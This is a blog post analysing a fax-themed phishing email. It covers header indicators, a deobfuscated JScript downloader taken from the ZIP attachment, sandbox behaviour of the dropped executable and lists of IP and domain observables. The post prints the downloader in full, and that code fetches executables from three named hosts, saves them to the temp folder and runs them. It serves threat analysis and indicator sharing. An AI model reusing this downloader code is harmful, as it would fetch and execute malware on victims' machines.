2016/02/08

Something Phishy – 02-08-2016

by Destruct_Icon
Categories: Analysis, Coding, JavaScript, Network Forensics

Something Phishy – Return of the Fax!

And we’re back with another “Something Phishy” for February. If you ever had a postal receipt sent to your e-mail, some of the behaviors may feel very familiar to you.

[Image: DIphisy2-1]

Apparently I received a fax from incoming@interfax.net. Let’s start by pulling all the information we can out of the headers.

All IPs and domains referenced in the headers point to GoDaddy (secureserver.net).

  1. p3plibsmtp01-08.prod.phx3.secureserver.net
  2. p3slh051.shr.phx3.secureserver.net
  3. 72.167.238.224
  4. 208.109.80.23
  5. 68.178.254.202

The interfax sender information is probably spoofed. The only other address I could identify in the headers was “swatwebteam”.

  1. swatwebteam@p3slh051.shr.phx3.secureserver.net
  2. incoming@interfax.net

Searching Google for “swatwebteam” doesn’t return much in connection with secureserver, but it may be worth searching for in your own environment. Let’s check out this interfax e-mail and see if there’s anything interesting about it.

[Image: DIphisy2-2]

It’s safe to say we can jump to the conclusion that this is bad, but let’s dig a bit into what was attached.

* The base64 of the attached file.

[Image: DIphisy2-3]

There’s the PK signature, so the attachment is a ZIP archive; now let’s see what’s inside.

[Image: DIphisy2-4]

This looks semi-similar to what we saw in our first “Something Phishy” post. Let’s deobfuscate the code and see what we can pull from it.

// Candidate download hosts, tried in order (single-space separator).
var b = "ecatt.org intecpi.com settlerscovewines.com ".split(" "); 
var ws = WScript.CreateObject("WScript.Shell"); 
// Dropped-file prefix: %TEMP%\794772 (String.fromCharCode(92) is a backslash).
var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"794772"; 
var xo = WScript.CreateObject("MSXML2.XMLHTTP"); 
var xa = WScript.CreateObject("ADODB.Stream"); 
var ld = 0;                                  // index of the last host that served a payload 
for (var n=1; n<=3; n++) {                   // three rounds, one payload each 
    for (var i=ld; i<b.length; i++) {        // later rounds resume at the last good host 
        var dn = 0; 
        try { 
            // a22 is the id value; its definition is not in this excerpt. 
            xo.open("GET","http://"+b[i]+"/counter/?id="+a22+"&rnd=283265"+n, false); 
            xo.send(); 
            if (xo.status == 200) { 
                xa.open(); 
                xa.type = 1;                 // adTypeBinary 
                xa.write(xo.responseBody); 
                if (xa.size > 1000) {        // anything smaller is treated as a dud 
                    dn = 1; 
                    xa.position = 0; 
                    xa.saveToFile(fn+n+".exe",2);   // adSaveCreateOverWrite 
                    try { 
                        ws.Run(fn+n+".exe",1,0);    // execute %TEMP%\794772<n>.exe 
                    } 
                    catch (er) { 
                    } 
                } 
                xa.close(); 
            } 
            if (dn == 1) { 
                ld = i; 
                break; 
            } 
        } catch (er) { 
        } 
    } 
}

Unfortunately beautifiers weren’t working for me, so I had to prettify it by hand; hopefully I didn’t miss any of the line breaks. Both the methods and the behavior now feel very familiar. Below are the immediate indicators to search for.

  1. ecatt.org
  2. intecpi.com
  3. settlerscovewines.com

Let’s build out the URLs and pull the malware down so we can do a bit of analysis.

hxxp://settlerscovewines[.]com/counter/?id=555C535E00011710161107103B0D070B0A2409050813011601130B08024A070B095E3C5E171305100001170D030A0B0A080D0A014A070B095E17565E5550515050525D55515D5E55&rnd=2832651

[Image: DIphishy2-5]

A picture? Naaaah!

[Image: DIphishy2-6]

Executable Information

  1. MD5: 8213fa36e697f524611680df3e887b6c
  2. VirusTotal: https://www.virustotal.com/en/file/26d2173e24c751fbdd0f163ac68bbb98d075674bbfa5e2d14370e661411d658a/analysis/

When run in a sandbox, the executable first appears to check for an internet connection. It also tries to set some interesting registry values under randomly named keys; the key names changed across multiple runs.

  1. RegSetValueEx(HKLM\software\3YvNoi95J\TI01YxJwf, REG_SZ: -TONS OF DATA HERE-
  2. RegSetValueEx(HKLM\SOFTWARE\F71B5913936CBADD67\\FA59BFD93688FD6535B, REG_SZ: FA59BFD93688FD6535B)
  3. RegDeleteValue(HKLM\SOFTWARE\F71B5913936CBADD67\\FA59BFD93688FD6535B)

Below are some of the imports and file information.

[Image: DIphishy2-7]

[Image: DIphishy2-8]

  1. Compilation Time: 04/02/2016 23:25:13
  2. File Description: Denials Queenliness Redrafts Frivolous

Detonating the malware produces some interesting results: a flood of outbound requests for “upload.php” and “/” against a long list of different IPs.

[Image: DIphishy2-9]

[Image: DIphishy2-10]

IP Observables

  1. 102.21.177.115
  2. 102.84.96.76
  3. 104.162.255.220
  4. 109.93.82.124
  5. 11.27.53.83
  6. 111.155.108.238
  7. 119.79.113.80
  8. 12.236.239.208
  9. 122.239.86.186
  10. 123.160.251.144
  11. 124.138.235.68
  12. 124.21.209.92
  13. 126.44.199.84
  14. 131.101.130.209
  15. 132.228.139.99
  16. 137.6.250.231
  17. 14.79.199.211
  18. 147.120.47.254
  19. 154.135.3.42
  20. 160.231.33.235
  21. 17.113.240.167
  22. 174.16.129.254
  23. 178.33.69.66
  24. 193.61.238.201
  25. 201.237.188.134
  26. 202.78.57.41
  27. 202.90.90.148
  28. 208.178.79.25
  29. 211.139.120.87
  30. 214.17.10.183
  31. 215.186.209.160
  32. 216.105.83.243
  33. 218.205.206.156
  34. 221.12.59.208
  35. 25.39.173.179
  36. 32.194.21.3
  37. 36.119.68.47
  38. 6.86.248.254
  39. 62.39.39.87
  40. 64.149.33.125
  41. 66.214.63.212
  42. 69.197.172.170
  43. 8.136.142.140
  44. 90.69.59.241
  45. 92.103.135.100
  46. 93.194.204.208
  47. 95.214.112.156
  48. 97.2.37.41
  49. 97.44.144.135

Ports Observables

  1. 80
  2. 8080
  3. 443

We used a modified version of our VT lookup scripts to check whether any of these IPs had hits on VirusTotal.

  1. Hit Count: 3 – http://178.33.69.66/upload.php has been identified as malicious.
  2. Associated with: Hit Count: 1 – http://davisheritage.com/ has been identified as malicious.

It definitely looks like there is some badness here. Some of these IPs may belong to the malware’s C2 infrastructure, but keep in mind that others could be legitimate connectivity checks or deliberate red herrings; the VirusTotal check only flagged 178.33.69.66, so treat the full list as a hunting set rather than a blocklist. All in all this isn’t anything new, and it behaves much like the “postal receipt” campaigns of yore. The network communication is extremely noisy: a single minute in our controlled environment produced thousands of outbound attempts. One of the more interesting things to note is that every request to upload.php and to the root page came back with a 404 or 400. Keep an eye out for e-mail from incoming@interfax.net, as it appears to be part of a campaign that has been hitting many people over the past few months. And don’t forget to educate your users: “Don’t talk to strangers!”


1 Comment

  1. Vickyz says:

    Hello, can you help me with how to download a file from virustotal.com?
    Thanks in advance.
